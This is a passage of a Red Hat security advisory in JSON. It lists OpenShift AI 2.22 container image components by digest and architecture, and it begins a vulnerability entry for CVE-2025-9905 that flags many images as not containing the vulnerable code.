"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"product_id": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odh-rhel9-operator@sha256%3Ab8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e?arch=arm64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764669148"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x"
},
"product_reference": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le"
},
"product_reference": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64"
},
"product_reference": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le"
},
"product_reference": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x"
},
"product_reference": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64"
},
"product_reference": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-9905",
"cwe": {
"id": "CWE-913",
"name": "Improper Control of Dynamically-Managed Code Resources"
},
"discovery_date": "2025-09-19T09:00:54.801987+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
